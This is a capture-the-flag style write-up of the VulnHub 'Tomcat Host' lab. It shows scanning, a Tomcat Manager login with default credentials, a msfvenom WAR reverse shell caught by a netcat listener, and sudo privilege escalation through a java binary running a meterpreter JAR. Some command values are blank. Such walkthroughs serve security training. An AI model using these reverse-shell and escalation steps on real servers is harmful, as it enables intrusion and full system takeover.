Tomcat Host

Welcome to “My Tomcat Host”. This boot to root VM is designed for testing your basic enumeration skills and concepts.

Url: Tomcat Host 1 VulnHub

Difficulty: Easy/Beginner Level

Author: Akanksha Sachin Verma


Firstly, a netdiscover scan will reveal how the machine can be identified on the network:

netdiscover -i eth1
some more code for example


Then an nmap scan:

nmap -p- -A


A closer look at port 8080 on my browser reveals an Apache Tomcat/9.0.31


Apache Tomcat is an application server designed to execute Java servlets and render web pages that use Java Server page coding.

The “Manager App” section requires a username and password. The default credentials for Tomcat work (tomcat:tomcat).

The Web Application Manager is an opportunity to upload a reverse shell. I’ll be using msfvenom to create a reverse shell. This is a good website on how to use msfvenom for reference:

Offensive Security

The payload must be a war file, listening on port 4444 with my local address.

msfvenom -p java/jsp_shell_reverse_tcp lhost= lport=4444 -f war > fedai.war

This will be uploaded here:


Before executing the payload, listen on port 4444 with netcat:

nc -nvlp 4444

Now it must be executed, so we visit the path where it is kept, in my case /fedai. We now have a reverse shell. Uid is ‘tomcat’.

python -c 'import pty;pty.spawn("/bin/bash")'



Always check sudo privileges to see how we can start escalating privileges:

sudo -l

sudo l

As demonstrated, the user tomcat can run commands here: /usr/lib/jvm/java-1.8.0-openjdk- This is an openjdk java binary file which we can use to exploit priviliges.

We’ll be creating another reverse shell payload on meterpreter in a java file format. Listening port will be 5555 with my local IP address again. The file will be downloaded on the victims pc so this file will be created under the apache web directory on my machine.

msfvenom --platform java -f jar -p java/meterpreter/reverse_tcp lhost= lport=5555 > fedai.jar


Start the apache2 service:

service apache2 start

Go to the temp directory on the victim’s machine and transfer the payload over.

cd /tmp



Before executing, we need to set up the meterpreter payload listener on metasploit:

use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lport 5555


Let’s execute this payload with the following command:

sudo java -jar fedai.jar


We get a successful connection from the tomcat machine as seen on meterpreter, the current user has been identified as root!


Written on May 3, 2020